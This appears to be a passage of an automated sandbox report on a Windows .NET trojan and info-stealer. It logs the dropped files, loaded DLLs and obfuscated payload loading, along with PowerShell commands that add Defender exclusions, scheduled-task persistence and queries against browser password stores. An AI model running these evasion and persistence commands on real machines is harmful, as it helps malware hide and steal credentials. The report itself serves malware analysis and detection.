Source: g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2559323570.000000000042B000.00000040.00000400.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: E*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp\
Source: RegSvcs.exe, 0000000C.00000002.2559323570.0000000000458000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2559302757.0000000000457000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: B*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: RegSvcs.exe | Binary or memory string: E*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@22/41@2/2
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | File created: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8596:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9068:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6852:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Mutant created: \Sessions\1\BaseNamedObjects\WrwtEhvPPTssAhNEmK
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8640:120:WilError_03
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | File created: C:\Users\user\AppData\Local\Temp\schvost.exe
Source: g44YQtTyjN.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: g44YQtTyjN.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RegSvcs.exe | Binary or memory string: SELECT item1 FROM metadata WHERE id = 'password';
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, LoginData.12.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: g44YQtTyjN.exe | Virustotal: Detection: 71%
Source: g44YQtTyjN.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | File read: C:\Users\user\Desktop\g44YQtTyjN.exe
Source: unknown | Process created: C:\Users\user\Desktop\g44YQtTyjN.exe "C:\Users\user\Desktop\g44YQtTyjN.exe"
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp8B71.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe"
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe"
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp"
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp8B71.tmp"
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: g44YQtTyjN.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: g44YQtTyjN.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: g44YQtTyjN.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: W.pdb4 source: g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: GCbd.pdbSHA256 source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.dr
                    Source: Binary string: GCbd.pdb source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.dr

                    Data Obfuscation

                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, c7051ZPN8xVt8hUhsG.cs | .Net Code: NNIop5eGT2 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, c7051ZPN8xVt8hUhsG.cs | .Net Code: NNIop5eGT2 System.Reflection.Assembly.Load(byte[])
                    Source: 13.2.ECmmsbHOaKPh.exe.3b5a528.3.raw.unpack, MainForm.cs | .Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, c7051ZPN8xVt8hUhsG.cs | .Net Code: NNIop5eGT2 System.Reflection.Assembly.Load(byte[])
                    Source: g44YQtTyjN.exe | Static PE information: 0xA26C8D88 [Mon May 8 14:51:52 2056 UTC]
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Code function: 0_2_06787750 push cs; ret 0_2_06787751
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0042C54C push eax; retf 12_2_0042C60D
